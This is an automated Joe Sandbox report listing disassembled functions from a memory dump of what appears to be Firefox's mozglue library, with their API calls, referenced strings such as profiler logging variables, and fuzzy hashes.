Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: AllocVirtual
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 4275171209-2186867486
Opcode ID: 9f8f935de94653ac65db46b0c6f2766408528d0946ca29d98d5c39011b3dcb21
Instruction ID: 8d2d31da99423ca1da97be1f51af25de81625c11ea9824aa909d2306d991b280
Opcode Fuzzy Hash: 9f8f935de94653ac65db46b0c6f2766408528d0946ca29d98d5c39011b3dcb21
Instruction Fuzzy Hash: 7131A7307422056BFB10AF668C45BAE7775BF85754F204118F612EB684DB70E501CBBD

Function 6C65ECD0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143fileCOMMON

Download Yara Rule

APIs

Part of subcall function 6C65F100: LoadLibraryW.KERNEL32(shell32,?,6C6CD020), ref: 6C65F122
Part of subcall function 6C65F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C65F132

moz_xmalloc.MOZGLUE(00000012), ref: 6C65ED50
wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C65EDAC
wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6C65EDCC
CreateFileW.KERNEL32 ref: 6C65EE08
free.MOZGLUE(00000000), ref: 6C65EE27
free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6C65EE32

Part of subcall function 6C65EB90: moz_xmalloc.MOZGLUE(00000104), ref: 6C65EBB5
Part of subcall function 6C65EB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6C68D7F3), ref: 6C65EBC3
Part of subcall function 6C65EB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6C68D7F3), ref: 6C65EBD6

Strings

\Mozilla\Firefox\SkeletonUILock-, xrefs: 6C65EDC1

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
String ID: \Mozilla\Firefox\SkeletonUILock-
API String ID: 1980384892-344433685
Opcode ID: aff3e682c30c1d894395bd1230d8b7f2f94c1da813581de920205db56cd4430b
Instruction ID: 58349f6a09830bb8ba9f10bcb68811798057119605d22f8757a79b57b5dcc24a
Opcode Fuzzy Hash: aff3e682c30c1d894395bd1230d8b7f2f94c1da813581de920205db56cd4430b
Instruction Fuzzy Hash: F251F171E052048BDF00DF69C8806EEB7F0AF4A318F94852DE8956B740E7346959C7EA

Function 6C6CA520 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C6CA565

Part of subcall function 6C6CA470: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6CA4BE
Part of subcall function 6C6CA470: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C6CA4D6

?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C6CA65B
?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C6CA6B6

Strings

0, xrefs: 6C6CA5FB
z, xrefs: 6C6CA6AE

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Builder@2@@$Ascii@CreateDtoaExponentialHandleMode@12@Representation@SpecialValues@memcpystrlen
String ID: 0$z
API String ID: 310210123-2584888582
Opcode ID: 712dce064de4174f7be760f1de679cf96d388de0a395e03b1cfbcc39e6cfbc89
Instruction ID: 04f669c28a7bbff4618a294ce90f01ccbc11bc35cfc35bd6eeabef394af0ac6b
Opcode Fuzzy Hash: 712dce064de4174f7be760f1de679cf96d388de0a395e03b1cfbcc39e6cfbc89
Instruction Fuzzy Hash: 75414771A097459FC341CF29C080A8BBBE4FF8A344F408A2EF49987651EB30D549CB87

Function 6C699420 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 6C68AB89: EnterCriticalSection.KERNEL32(6C6DE370,?,?,?,6C6534DE,6C6DF6CC,?,?,?,?,?,?,?,6C653284), ref: 6C68AB94
Part of subcall function 6C68AB89: LeaveCriticalSection.KERNEL32(6C6DE370,?,6C6534DE,6C6DF6CC,?,?,?,?,?,?,?,6C653284,?,?,6C6756F6), ref: 6C68ABD1

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C664A68), ref: 6C69945E
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C699470
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C699482
__Init_thread_footer.LIBCMT ref: 6C69949F

Strings

MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C699459
MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C69946B
MOZ_BASE_PROFILER_LOGGING, xrefs: 6C69947D

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
API String ID: 4042361484-1628757462
Opcode ID: 1975ebd18fdda91212e2c2a4ae65ce86654b8f1e754ebe6337f32358a6cf2a89
Instruction ID: aa2c4d1473f1cb2f1ae45731b97a48eff6bf2a21c92b5f4b9591bb7a0ffbe7d0
Opcode Fuzzy Hash: 1975ebd18fdda91212e2c2a4ae65ce86654b8f1e754ebe6337f32358a6cf2a89
Instruction Fuzzy Hash: C5012830A001028BD7109B5ED840A8D33B99F06B3DF054537DD0AC6B52D623F4648D5F

Function 6C65B630 Relevance: 12.1, APIs: 8, Instructions: 128COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(?,?,?,?,6C65B61E,?,?,?,?,?,00000000), ref: 6C65B6AC

Part of subcall function 6C66CA10: malloc.MOZGLUE(?), ref: 6C66CA26

memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C65B61E,?,?,?,?,?,00000000), ref: 6C65B6D1
memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?,?,?,6C65B61E,?,?,?,?,?,00000000), ref: 6C65B6E3
memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C65B61E,?,?,?,?,?,00000000), ref: 6C65B70B
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,6C65B61E,?,?,?,?,?,00000000), ref: 6C65B71D
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,6C65B61E), ref: 6C65B73F
moz_xmalloc.MOZGLUE(80000023,?,?,?,6C65B61E,?,?,?,?,?,00000000), ref: 6C65B760
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,6C65B61E,?,?,?,?,?,00000000), ref: 6C65B79A

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfreemalloc
String ID:
API String ID: 1394714614-0
Opcode ID: b6f95eb9980117f64b0a6e82c9f44ffb228db0619a477cfe8d4454a6a340f864
Instruction ID: 25f7ad8c1ce3fb9c4c211db8e93f4453b592f1bf7e2131b02846affe1d512b41
Opcode Fuzzy Hash: b6f95eb9980117f64b0a6e82c9f44ffb228db0619a477cfe8d4454a6a340f864
Instruction Fuzzy Hash: 5C41D5B2D001159FCB04DF68DC806AFB7B5FF85324F650669E825E7780E731A9148BE9

Function 6C6CB540 Relevance: 12.1, APIs: 8, Instructions: 93COMMON

Download Yara Rule

APIs

?classic@locale@std@@SAABV12@XZ.MSVCP140 ref: 6C6CB5B9
??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6C6CB5C5
??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6C6CB5DA
??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6C6CB5F4
__Init_thread_footer.LIBCMT ref: 6C6CB605
?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,?,00000000), ref: 6C6CB61F
std::_Facet_Register.LIBCPMT ref: 6C6CB631
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C6CB655

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_?classic@locale@std@@Bid@locale@std@@D@std@@Facet_Getcat@?$ctype@Init_thread_footerRegisterV12@V42@@Vfacet@locale@2@abortstd::_
String ID:
API String ID: 1276798925-0
Opcode ID: 3c1a17819dfe9a350094352700d341752c2ca1ac99d6397397ee31cc8f07406e
Instruction ID: 70af877dea57f0e7fc2c37128b4d8ba1b432833bcab7c8e056cdc96acfe85fe5
Opcode Fuzzy Hash: 3c1a17819dfe9a350094352700d341752c2ca1ac99d6397397ee31cc8f07406e
Instruction Fuzzy Hash: FB316F71B002058BCB00DFAAC8989AEB7F5EFCA325F150519D90697780DB31B906CF9E

Function 6C696590 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 342COMMON

Download Yara Rule

APIs

Part of subcall function 6C68FA80: GetCurrentThreadId.KERNEL32 ref: 6C68FA8D
Part of subcall function 6C68FA80: AcquireSRWLockExclusive.KERNEL32(6C6DF448), ref: 6C68FA99

ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C696727
?GetOrAddIndex@UniqueJSONStrings@baseprofiler@mozilla@@AAEIABV?$Span@$$CBD$0PPPPPPPP@@3@@Z.MOZGLUE(?,?,?,?,?,?,?,00000001), ref: 6C6967C8

Part of subcall function 6C6A4290: memcpy.VCRUNTIME140(?,?,6C6B2003,6C6B0AD9,?,6C6B0AD9,00000000,?,6C6B0AD9,?,00000004,?,6C6B1A62,?,6C6B2003,?), ref: 6C6A42C4

Strings

vml, xrefs: 6C69696C
data, xrefs: 6C696593

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentIndex@P@@3@@ReleaseSpan@$$Strings@baseprofiler@mozilla@@ThreadUniquememcpy
String ID: data$vml
API String ID: 511789754-3335688618
Opcode ID: 1ea53a4bcef78ae37e8f2907a97228b96f43628bc8324aa79383644413eedc8a
Instruction ID: 20ff2b914093ae74997b57c34fa08c7436a05d9ac23ef9eda6ba70f89351a345
Opcode Fuzzy Hash: 1ea53a4bcef78ae37e8f2907a97228b96f43628bc8324aa79383644413eedc8a
Instruction Fuzzy Hash: F9D1CE75A083419FD764CF25C840B9EB7E5AFC6308F10492EE58987B51EB30E949CB9B

Function 6C68D5D0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 279COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000001,?,?,?,?,6C65EB57,?,?,?,?,?,?,?,?,?), ref: 6C68D652
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6C65EB57,?), ref: 6C68D660
free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C65EB57,?), ref: 6C68D673
free.MOZGLUE(?), ref: 6C68D888

Strings

Wel, xrefs: 6C68D5D9, 6C68D63F
|Enabled, xrefs: 6C68D81E

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: free$memsetmoz_xmalloc
String ID: Wel$|Enabled
API String ID: 4142949111-1036103015
Opcode ID: dd42113ae65c5df3a0ce37b97dceeea840c04748c57847a24978f9c8794ba008
Instruction ID: 73895f8debc637035f6ab12ae7658e5f5767ac23accadb84eb3d4b2661b4f139
Opcode Fuzzy Hash: dd42113ae65c5df3a0ce37b97dceeea840c04748c57847a24978f9c8794ba008
Instruction Fuzzy Hash: 14A1F2B0A012499FDF10CF69C4907EEBBF1AF4A318F58805ED885AB741C734A845CBB9

Function 6C6A1D00 Relevance: 10.6, APIs: 7, Instructions: 115threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C6A1D0F
AcquireSRWLockExclusive.KERNEL32(?,?,6C6A1BE3,?,?,6C6A1D96,00000000), ref: 6C6A1D18
ReleaseSRWLockExclusive.KERNEL32(?,?,6C6A1BE3,?,?,6C6A1D96,00000000), ref: 6C6A1D4C
GetCurrentThreadId.KERNEL32 ref: 6C6A1DB7
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C6A1DC0
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C6A1DDA

Part of subcall function 6C6A1EF0: GetCurrentThreadId.KERNEL32 ref: 6C6A1F03
Part of subcall function 6C6A1EF0: AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,6C6A1DF2,00000000,00000000), ref: 6C6A1F0C
Part of subcall function 6C6A1EF0: ReleaseSRWLockExclusive.KERNEL32 ref: 6C6A1F20

moz_xmalloc.MOZGLUE(00000008,00000000,00000000), ref: 6C6A1DF4

Part of subcall function 6C66CA10: malloc.MOZGLUE(?), ref: 6C66CA26

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$mallocmoz_xmalloc
String ID:
API String ID: 1880959753-0
Opcode ID: 4c4b000d06f41878ff19d4314d7ed2d066b6f97361b661544fa9a5f223976c85
Instruction ID: 6237317cd5e8c4c48d03eaf6022813b837f2a5122011ce4a3e1288e701c1984f
Opcode Fuzzy Hash: 4c4b000d06f41878ff19d4314d7ed2d066b6f97361b661544fa9a5f223976c85
Instruction Fuzzy Hash: 434167B52007019FCB10DF69C488A56BBF9FF89314F10442EE95A87B41DB31F855CB99

Function 6C6984E0 Relevance: 10.6, APIs: 7, Instructions: 79COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6984F3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C69850A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C69851E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C69855B
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C69856F
??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6985AC

Part of subcall function 6C697670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C6985B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C69767F
Part of subcall function 6C697670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C6985B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C697693
Part of subcall function 6C697670: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C6985B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6976A7

free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6985B2

Part of subcall function 6C675E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C675EDB
Part of subcall function 6C675E90: memset.VCRUNTIME140(ewkl,000000E5,?), ref: 6C675F27
Part of subcall function 6C675E90: LeaveCriticalSection.KERNEL32(?), ref: 6C675FB2

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
String ID:
API String ID: 2666944752-0
Opcode ID: 983fe677dbbdfd636f57bc4bf4f18da6e73b00731ded2bd3697c35bd201452d4
Instruction ID: b02f8cc00a9fe643691ff8c2603e189c6edef795f28809ea080049c642b51048
Opcode Fuzzy Hash: 983fe677dbbdfd636f57bc4bf4f18da6e73b00731ded2bd3697c35bd201452d4
Instruction Fuzzy Hash: 7D218E742006029FDB14DF29C888A5AB7B5AF8930CF24492DE55BC3B51EB31F949CB59

Function 6C661640 Relevance: 10.6, APIs: 7, Instructions: 77COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,00000114), ref: 6C661699
VerSetConditionMask.NTDLL ref: 6C6616CB
VerSetConditionMask.NTDLL ref: 6C6616D7
VerSetConditionMask.NTDLL ref: 6C6616DE
VerSetConditionMask.NTDLL ref: 6C6616E5
VerSetConditionMask.NTDLL ref: 6C6616EC
VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C6616F9

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ConditionMask$InfoVerifyVersionmemset
String ID:
API String ID: 375572348-0
Opcode ID: f84841580bed524b7193ec7398748102c90c56b468ac830f6a53935fa1e8d8bc
Instruction ID: 5ebc18347cdce2e6c4c196cc0c98d8f41758e16dacbf56acbe91b7dc95ca951f
Opcode Fuzzy Hash: f84841580bed524b7193ec7398748102c90c56b468ac830f6a53935fa1e8d8bc
Instruction Fuzzy Hash: AA21D5B07442086BEB105A66CC85FFBB37CDFC6704F044528F6459B5C0C675AD54C6AA

Function 6C69F5B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C68CBE8: GetCurrentProcess.KERNEL32(?,6C6531A7), ref: 6C68CBF1
Part of subcall function 6C68CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6531A7), ref: 6C68CBFA

Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C664A68), ref: 6C69945E
Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C699470
Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C699482
Part of subcall function 6C699420: __Init_thread_footer.LIBCMT ref: 6C69949F

GetCurrentThreadId.KERNEL32 ref: 6C69F619
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C69F598), ref: 6C69F621

Part of subcall function 6C6994D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6994EE
Part of subcall function 6C6994D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C699508

GetCurrentThreadId.KERNEL32 ref: 6C69F637
AcquireSRWLockExclusive.KERNEL32(6C6DF4B8,?,?,00000000,?,6C69F598), ref: 6C69F645
ReleaseSRWLockExclusive.KERNEL32(6C6DF4B8,?,?,00000000,?,6C69F598), ref: 6C69F663

Strings

[D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C69F62A

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Currentgetenv$ExclusiveLockProcessThread$AcquireInit_thread_footerReleaseTerminate__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
API String ID: 1579816589-753366533
Opcode ID: e2d03c83da65c5bc3704851d928221812889342721b3c5fc36cc22143e4ac105
Instruction ID: 0bd65e644daed088f08fe6fcc9a834646c2bc799f70e34fbc658b7f133535696
Opcode Fuzzy Hash: e2d03c83da65c5bc3704851d928221812889342721b3c5fc36cc22143e4ac105
Instruction Fuzzy Hash: 4D119175201206ABCB44AF5AC8889A97779FFC6759F550416FA0583F01CB71B812CBAE

Function 6C6B76C0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 6C6B76F2
moz_xmalloc.MOZGLUE(00000001), ref: 6C6B7705

Part of subcall function 6C66CA10: malloc.MOZGLUE(?), ref: 6C66CA26

memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C6B7717
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,6C6B778F,00000000,00000000,00000000,00000000), ref: 6C6B7731
free.MOZGLUE(00000000), ref: 6C6B7760

Strings

}>il, xrefs: 6C6B76C4

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ByteCharMultiWide$freemallocmemsetmoz_xmalloc
String ID: }>il
API String ID: 2538299546-1725928026
Opcode ID: 2195319edaf78c9abde5db2944dedad8b5fbb5b4cca38b54291dd1d8e3d53320
Instruction ID: 69dadac1c372adee9e4d185efa5b35e7bcfef7ba5702c5b4d1b166416e3f892e
Opcode Fuzzy Hash: 2195319edaf78c9abde5db2944dedad8b5fbb5b4cca38b54291dd1d8e3d53320
Instruction Fuzzy Hash: C811C4B19042156BE710AF7A9C44BABBEE8EF46354F044439F848E7300E7709850C7F6

Function 6C660EE0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 51libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C68AB89: EnterCriticalSection.KERNEL32(6C6DE370,?,?,?,6C6534DE,6C6DF6CC,?,?,?,?,?,?,?,6C653284), ref: 6C68AB94
Part of subcall function 6C68AB89: LeaveCriticalSection.KERNEL32(6C6DE370,?,6C6534DE,6C6DF6CC,?,?,?,?,?,?,?,6C653284,?,?,6C6756F6), ref: 6C68ABD1

LoadLibraryW.KERNEL32(combase.dll,00000000,?,6C68D9F0,00000000), ref: 6C660F1D
GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 6C660F3C
__Init_thread_footer.LIBCMT ref: 6C660F50
FreeLibrary.KERNEL32(?,6C68D9F0,00000000), ref: 6C660F86

Strings

CoInitializeEx, xrefs: 6C660F36
combase.dll, xrefs: 6C660F18

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
